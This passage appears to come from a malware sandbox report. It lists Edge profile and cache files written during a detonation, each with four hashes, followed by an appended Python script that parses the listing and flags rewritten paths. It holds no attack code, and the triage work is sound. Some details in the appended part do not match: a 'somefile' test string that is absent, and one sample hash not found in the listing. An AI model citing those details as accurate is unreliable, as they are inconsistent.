MD5 4da1374687357b7de81b6bee9961395c
SHA1 fb609db3117f223661d48c25a07bd4dfdad084ec
SHA256 3fa79c7c314217d686f81f055ca7c6dc1667e386789fa270b948de377df59c48
SHA512 07a491b9431ce764e869b97b3e6ed8843543bcc73449f73ba9217556b7ea0c20d0b2323f14d7fd4291e2edbdcb72d9e5cacc1638b3bdf7076d7b7622b8b797ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\8412cb08-be94-44d6-8adb-2cdfe84a7bb2\index-dir\the-real-index~RFe64e6b7.TMP

MD5 63317da6a6ac0bfb547baa575815f934
SHA1 28f92f2f402164ac54f4ff5f15f80f2139f8ea99
SHA256 45ba18678cbb0571c988d83f3e9ddea065f98fb45e642848e3a8ca44f145a730
SHA512 1704f847cca224be549b62e9d8eee86963ba862e622bc6be6d06748116ccf5b383bcb28af0c01e131f1e2d192e7fe4454b9bbefc459af31a09eddc253ff813fe

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

MD5 39ead90e06749e5e68d7d418de0668ce
SHA1 7f5f88aa3e345cba959aeb95ef732e76710073b2
SHA256 144149e31632fee1c4a30d48d58c2878f32b72886d78727e20c99062dae2ec11
SHA512 f50c92ff2864ee85c9ecfb39e02042f1382c27d46afe6a633b91b1045c00fb734f942759518311fbd92777426ff5ab548f183480b4c59b0f8d8b77986770a9bb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000bf

MD5 9901c48297a339c554e405b4fefe7407
SHA1 5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e
SHA256 9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2
SHA512 b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 7a0e010aac0107842f952c1530a3c637
SHA1 4a0a0d48f908802249c4ca7c8a6b69e1bde02066
SHA256 a95d9d200f7017c71d89f3476354cf3a8e4370b2dd219483688f4d4ef7841fef
SHA512 abb5553f24bb7a6295e7916ba8c9ba727f6b20ecd698e3d16d6b0d96accebd0772fcfb5e231647d6e118766bfd819019c0aca897128fd284bbd4d85f6042b598

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe652f88.TMP

MD5 5b20510da33fb996fe47f284e95195d0
SHA1 e85be8018d3ddd313217b4ea9122c3e920ba5100
SHA256 949e893c427f3c9853d9e28aa04e98c56ff3ab65d61fc1e554dfc0ff18ccfc37
SHA512 85a56da79693b8387d9412f0a7d47a3db49953bfe6e467c1b84f9775e16c00052c7389fc616440b8ec54e4147e102261afc16a1b67503d175d49d8a6062c9208

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 fae253f28289575ad34f759ba7ad95ff
SHA1 7d4e54ad904a32b66bbc318536c6fa315565c3b9
SHA256 b6951ee1d368f735a2741dcf7540a11b026e47adc1c4edcfa588e38828c3c8cd
SHA512 5c5ac839ff2eb742cd0eb55e9b94ae9ca9dee23d5da4d07aff20d16fa70bb9b9f9c45aff22f925ac40d69659b478ab853c02ca3386ce8d6a4810f57a96b444d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 53667a34c0aea1190748e7a8e56fbaec
SHA1 f342cf6eb888f6e67f81649f74f7be7ded06b9ac
SHA256 975b2a317b39f17e594e54724ea00ca36302a5f3d5ce3bb2fbc2661652c3343a
SHA512 2048231297085b2c332a7a3dbad5cbfcf0ae0580156cf11b3e464b5d37919104d71ebcd790a1831fa9a431507f7fde99a72d958e1f988c46289b1ffec8a7b9a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\f1cdccba37924bda_1

MD5 4a5900f8e56164977e742b5526538b22
SHA1 e293fa397c9f16562dc485e10721404c2e7d1aff
SHA256 c8d796e90b7cb640a5503c7fb16f8605784c57c100b5ed38884f68d53d48a993
SHA512 43062f0ec761585217a136d3338c05561d3399970f8b8e89c207d45cf43d8f93e606c3216d7dcd77931d651b27b8179e8657251df490a3c7ec1c3c5913bd6014

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a3

MD5 df1d27ed34798e62c1b48fb4d5aa4904
SHA1 2e1052b9d649a404cbf8152c47b85c6bc5edc0c9
SHA256 c344508bd16c376f827cf568ef936ad2517174d72bf7154f8b781a621250cc86
SHA512 411311be9bfdf7a890adc15fe89e6f363bc083a186bb9bcb02be13afb60df7ebb545d484c597b5eecdbfb2f86cd246c21678209aa61be3631f983c60e5d5ca94

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 0595b7f6171d93416faf206fcd5a1415
SHA1 427a5e98a2a94393b6e34b7a87cd1926fb5dc093
SHA256 b2000124ccd1bb329411e57704b4923fbfe198b5dbf5e4ca19f74768745c8f8b
SHA512 b923eb1b0e5825854ac73541d4c550eb7b579b2ce6d9a0574d56bee455336f8e18dbfd6efa38ced1158d03aadb9d38ff3f2a09cccd8a8df0cc1f594274fc6ac1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 04834af6412bf304d6a155f63209389b
SHA1 c8e00dbd6fbe8e852c2861a3e8d6fcc15c563c20
SHA256 8be4ee88d9bdf02c1ac464f7828a38dfe9d84075074abe0084f1a1b8c8e2115e
SHA512 372cd6824cabfe454e07780f799e05142d817d7a62a4eef9ed84b0269decc0ea5fd47242c18ea18cb285464a88b2926340b83f859637929936af19413e5a2042

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c6

MD5 8b2faae925aa6aad36665886d7be994e
SHA1 2800fe40428df2f253254e6edb1b75430a400f99
SHA256 3392235a153b864f964c6d79555af394341b9d0d434739e5a20b84e7c40d4e45
SHA512 6f44f92c3953f7623d7c2002262da00550cf7c5d6e5741dab71fed34943f4c9c1eb3e871480cc6aaed6b8ed59145bc4d4aa5f359a339e79b166f1eec90724b51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c7

MD5 e2f7fa049dcabacce8d45f2ca6a3d638
SHA1 e51501bb97446080f3590b6e6515401e3063bb27
SHA256 a31f7f64df8d0c7e6030fc03e46061a18f47c23756135bfed3d36c20589b631a
SHA512 b62f314e391c39c79fea787e8578e334588fbb05ea0d5d7bbacac3d873502291961ce7c58bb1df7dad957f3c313e9f0aacf854d458dd77560f5f300203e23f60

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c3

MD5 97b97a5078f4541e6f90664aa96b63fa
SHA1 68f1f46c659eacd26594b0c7af364c52f2752164
SHA256 c11de051fb856023fcffa70f29c26267dedb12e1197da8d2874c4586e3ad8a24
SHA512 60e1d1c9d075bbbb48eacc1577cb18f5de03ef4a265a9863e2e4d513a64b07d03dcf2a839444df8fbc75640234f77ab4e0237f3ad4f7ea1040dd2927f2839d3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000c5

MD5 482c43f3b7651e92364bda649a4f41cb
SHA1 7f493ad447e8c91331168b8d84bbf8655e8675b5
SHA256 dc84a25d08756cded03cc1b3a0e191ef1194d5490c3965908631ca474ed71c96
SHA512 8e4e2812b024dc0ba82d09c1bb197ea79f22574ea7128685302dc02d9383eea432695c3c4eeb38eeedfb892120d6ad49f76f363a23f26ba3cd06f92e7477b202

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000e3

MD5 36c1136e329b90f3329ba402c9598677
SHA1 8ccc399667617192495b3ecdf979b1601b160d7d
SHA256 4e4b9e11b81b1f9fa9e9800786215480cb1001a44ec6cbb3175195e0c30a84d4
SHA512 8cd87d4eb417df316dfb6af47375d1b64b34c1a3ce3c2e90f514521ed08ef3f7cf6e20b68ad88a4713831f9520b1556331a8e367289f0416338e6b02557074d1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 bd3f820bb4ef284d0b2bb1056c45353f
SHA1 66d79e8f77cca9005b5edee4a21b3501165fbfbd
SHA256 0d9fd759d19ff78d95c48512a89ffa3406681d58689a1f854ce60eaf52486734
SHA512 663ec877270242ebca572b982f8c08a653d21af4795e8553eb81d8fe80d34720a2a6a079aa8dea8b4e6bb18941026c5d6b35a1cddc7e8a4e1bb2a696fde85ba4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000077

MD5 8e37ba24d8af4a4c48d433c7cfe15d4c
SHA1 028943014ff75e2cadedec1732ea7bc3fe95a655
SHA256 54e5e4ec1f3499ae215fff9208b65d92c678d929ba12dacd995fe73057ffd2e2
SHA512 538e44e321eea07613af8ff9a51f0dc6351bd77ec061a398a666cf2a2da6a9729f07784778f277437d3258c952332ae999370ddb84abdc6373888990bd13f66b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000cb

MD5 4d28d4f6a7672d0296cc958abadf2ad0
SHA1 6f08f305410a8a725a0d92823308006bb0b1a8ee
SHA256 0cb5f1cc3e8eeaf1933dc656109e07bd284ba1255bf7a0dad3e8049755546f30
SHA512 ebbcaeb9673824fd9dc0773eac73fd00b756f1b211c784263b58143bdc56fcf241cf4a34514e6d5ca92d259160afbae6c91dcb894b7ef3985fff85cf14a67a47

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\c971e2fa-b8a2-47b5-a4ad-0a1b8ab2c3f5\1189fdfaeeff8977_1

MD5 4b53dba74cc20b18a67e6de563a75741
SHA1 0f95fa6465bbfb87bbe85392d0f95b49a8a76019
SHA256 95cab0735d5ee20ccef9688946d9eed39c4aedec940fc3a128fd8456e8c95560
SHA512 5d1afd72e8e7a7b319cfe71cf2ef32f4a11d78c108d674bc85024b3a6d29c89fd325fb38a5739d5ee962b909a754f424a221dac99a48d48f8b5f6d04d1b1ed4f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\c971e2fa-b8a2-47b5-a4ad-0a1b8ab2c3f5\1189fdfaeeff8977_0

MD5 01618e94ac28352e036fdcd9759b3f4d
SHA1 e26ca1135f1fa9f03287df5a8291a3f0cd59522c
SHA256 1e8e79de8c59f264d1d934439ca832c00ff7adaccde9ff946da8ca10fdc5a102
SHA512 055fa73ade74639692f818b5fe20b058f49da335a7b47c45ec9a88c14a5981b1086105c1395c51fe47c6bf6bd046e2dd9adcf7cce5815399c727c461419663ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000083

MD5 c530e7f62c67777d7e5147e08452a60d
SHA1 8c2fc6bb7c0962fe608f9b5c682e26e0fdce6e35
SHA256 4e2ebda8596e6e8e18af2ddb7daf2a7ce0addce410bc008c796a09ccbee400b7
SHA512 4927c87138552afb2a5a1bfd02ca05286ef1fa7df21d15018a355c0aa9ec193097e98cc06d89ea29cf45cfa48d1b47170d21222ed7b0dca86166e89330841c03

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009d

MD5 4d9c5e8bfd271febb1c39c035195b918
SHA1 2311a50287d0610ce4521461a0900dc9670ab561
SHA256 747e9da9de1fe569e353d2b59781cf7b0f2f844775f2e5e93b52d48bfab6019a
SHA512 fd529afe8d760f497e8fb625bbd3fa9efab4ee6af1a803199484879b625b1bee9c346fabb6e151d74db3c2f15f47721a96dfa57bb94d6cbba6bcc117d578bfd6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009e

MD5 396b01ac85cbb981aff2a122a49d151a
SHA1 d85b6722649c41ed2ac40611f636b6820f3e6101
SHA256 3b49dc3579d8ace767893c0d697718bfdee790e0e7b72fb3b349276522c3d7a6
SHA512 9fecfea644381fdcba54f877df1e79ad8a02c1f721ed66fa55f886b7867ed6ae9b718c6774b78a0a2ad6fec573f5357270e7c8c001aa53fa58b2926f8df6204d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000103

MD5 b47cbb0e2a1d11e27287ac3d71dfdb35
SHA1 018c0219c44dd3ec0f736e3ece17cb31d53d9db0
SHA256 1f62e3b9384e59aa83d642665a03acfae7afa9f5c5170ebe267d1f34446db466
SHA512 6b59d97264adb195d89c821707dcb382d42e909c48cd25ad03616207a1d0864279ea63010c4efa928d6f4f2197c9eb5f436243e8638644068627db478fdae621

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00009f

MD5 14ed181df6e1da5e0043f0e74d56beac
SHA1 1cfce75631f695c68b996d90bab28b8896ac0a65
SHA256 f6872bfd7ee2a8655f1974851c05e0f87ff7dfa707e00a00f2744b3dc2468cdd
SHA512 837ee3b662c282169c2fd233ed8b67ba577d0ea9d65fee850d0d0d11fc37317a533eba02fd046f461b3052c96d3270dc86363360b45d2ef53d85fa7a5c1c5ea6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000105

MD5 21905c192da74e4659b420cff198ab24
SHA1 db6c1832cef645666e735ad73eaebd193f2732af
SHA256 9a1d5ec662544ea6e0daf22a8d0827fe5df4f6b1b13dc8d839b9958d7d77c2b0
SHA512 5db6e67c94f2b7d8a3c1f451643f53c47698f2273f8240b148aee3f4a4b02a5ae7b4ae67a4fe8c1da02218423646e6fe69b26bd3bcf156a9fd08a3fc2c86b430

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000a0

MD5 8f250a8a9272b16334ec75f930487a25
SHA1 700511b72466b885534d99f7615523ccf04ea0a1
SHA256 a4d67fc1333423b3d17b1b170117c5b4452dcd5553f7160013d2c27c793f8bdf
SHA512 78206fdcecd0b54cfa88b1da8df0dad6a6615a91dbaa38addbf15f5cfa55965f5b1c7424950378ff94ed8fcb39055c3d98f093103d3e2ce4e60e8c2595670dd5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000106

MD5 c68511dd520d2ac01e6f5b8685a4d339
SHA1 418a609c25a5b2fb984183643d29477f1045b603
SHA256 656d9b229770dbe3e0b2d0249885bb7f9225d68255f81c188df339a4427d9dcc
SHA512 c7e7395cda4adb805d2a7fe2ba10c96a8e07c57276a72820618e66ae0d2e463784a9e63f8c256d0e3762be81e1e3feffd85d7ccf8017273af954fb12e701179e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

MD5 b7675d993099a11342722e60453ee5b3
SHA1 0377b656beb29942df6a8547efd61424b4fd7af9
SHA256 5b006ff0be2173d6734eff55e5bdbe4dca385ce4924c5b80fb700ca3d22132d1
SHA512 96e6e3b0b1c0105318c02078cae62ae292a025392b05b529176df5cf90f0dfab655b7c07c096b7d5a857184ec5e44f02d9b7ab1345995981a39905dca13c0d1d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 0b8b10cdc3d38fe760465123a3331562
SHA1 5b80910dc5dd4473d1d501cb608f7dca1fa71642
SHA256 4a9c35d132a4f2be1bbaae4d0e6e2161b01dcd3d1a544505428a0d0eb5d8d448
SHA512 12f18df35f4ce853f499f0ddd859668f0c96b4e404e751577522a028dd5efb05a6d798a7ee4fc9a987726a994041f89946dc1cbeb63a9a3d2f949cd37bab3006
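The listing above records every file the detonation wrote, several of them under the same path more than once with different digests (for example RevisitationBloomfilter and Network Persistent State each appear three times). As an added example, not part of this report or its sandbox tooling, the following Python script parses the report's own path-plus-four-hashes layout, checks each digest has the expected hex length, reports which paths were rewritten during the run, and separates Edge profile churn from any other write that would merit a closer look. The three sample entries are copied from this Files list; the `somefile` string used only in the test is a constructed stand-in, and the Edge profile substring used for triage is an assumption about the path layout, not something the report states.

```python
"""Parse a sandbox "Files" listing (path + MD5/SHA1/SHA256/SHA512 blocks),
validate the digests, and find paths the sample wrote more than once."""
import re
from collections import defaultdict

# Expected hex-digit length of each digest the listing carries.
HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")

# Constructed sample: three entries copied from the report's Files list,
# in the report's own layout (path, blank line, four hash lines, blank line).
SAMPLE = r"""
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 9d292f88aa8ce59a2feb72df9df73b6b
SHA1 5fceac720c4dc38faf2580c904e318fc54dd5206
SHA256 cb5f9e7376d19b2b5c7442cc54f1f9fc8736587e4118be44eced7e0d9828b9c6
SHA512 22c727a5192f549c5d276af2a59b246df91526b00a71422fa3ca7e4266284c9b678154492b474212db2621cd6dbfb773838033a253a25401b7d2a286a5d969a3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000bf

MD5 9901c48297a339c554e405b4fefe7407
SHA1 5182e80bd6d4bb6bb1b7f0752849fe09e4aa330e
SHA256 9a5974509d9692162d491cf45136f072c54ddc650b201336818c76a9f257d4d2
SHA512 b68ef68c4dcc31716ce25d486617f6ef929ddbb8f7030dd4838320e2803dd6dd1c83966b3484d2986b19f3bd866484c5a432f4f6533bb3e72f5c7457a9bb9742

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RevisitationBloomfilter

MD5 53667a34c0aea1190748e7a8e56fbaec
SHA1 f342cf6eb888f6e67f81649f74f7be7ded06b9ac
SHA256 975b2a317b39f17e594e54724ea00ca36302a5f3d5ce3bb2fbc2661652c3343a
SHA512 2048231297085b2c332a7a3dbad5cbfcf0ae0580156cf11b3e464b5d37919104d71ebcd790a1831fa9a431507f7fde99a72d958e1f988c46289b1ffec8a7b9a7
"""

# Assumed marker for Edge profile writes (browser activity, not a payload drop).
EDGE_PROFILE = r"\Microsoft\Edge\User Data"


def parse_files_section(text):
    """Return a list of {path, MD5, SHA1, SHA256, SHA512} dicts, one per entry."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and entries:
            entries[-1][m.group(1)] = m.group(2).lower()
        else:
            # Any non-blank line that is not a hash line opens a new entry.
            entries.append({"path": line})
    return entries


def hash_problems(entries):
    """List (path, algorithm, reason) for digests that are missing or malformed."""
    problems = []
    for e in entries:
        for algo, length in HASH_LENGTHS.items():
            digest = e.get(algo)
            if digest is None:
                problems.append((e["path"], algo, "missing"))
            elif len(digest) != length:
                problems.append((e["path"], algo, f"length {len(digest)} != {length}"))
    return problems


def rewritten_paths(entries):
    """Map path -> ordered list of distinct SHA256 values for paths recorded
    with more than one digest, i.e. files overwritten during detonation."""
    seen = defaultdict(list)
    for e in entries:
        sha = e.get("SHA256")
        if sha and sha not in seen[e["path"]]:
            seen[e["path"]].append(sha)
    return {p: shas for p, shas in seen.items() if len(shas) > 1}


def triage(entries):
    """Split paths into Edge profile churn and everything else; the second
    bucket is where a dropped payload or staged tool would show up."""
    browser, other = [], []
    for e in entries:
        bucket = browser if EDGE_PROFILE.lower() in e["path"].lower() else other
        bucket.append(e["path"])
    return {"browser_profile": browser, "other": other}


if __name__ == "__main__":
    ents = parse_files_section(SAMPLE)
    print(f"{len(ents)} entries, {len(hash_problems(ents))} malformed digests")
    for path, shas in rewritten_paths(ents).items():
        print(f"rewritten {len(shas)}x: {path}")
    print(triage(ents))
```

Feeding the whole Files section through `parse_files_section` makes the repeated-path pattern visible at a glance; every path that lands in the `other` bucket of `triage` is the one worth pulling from the sandbox for a second look.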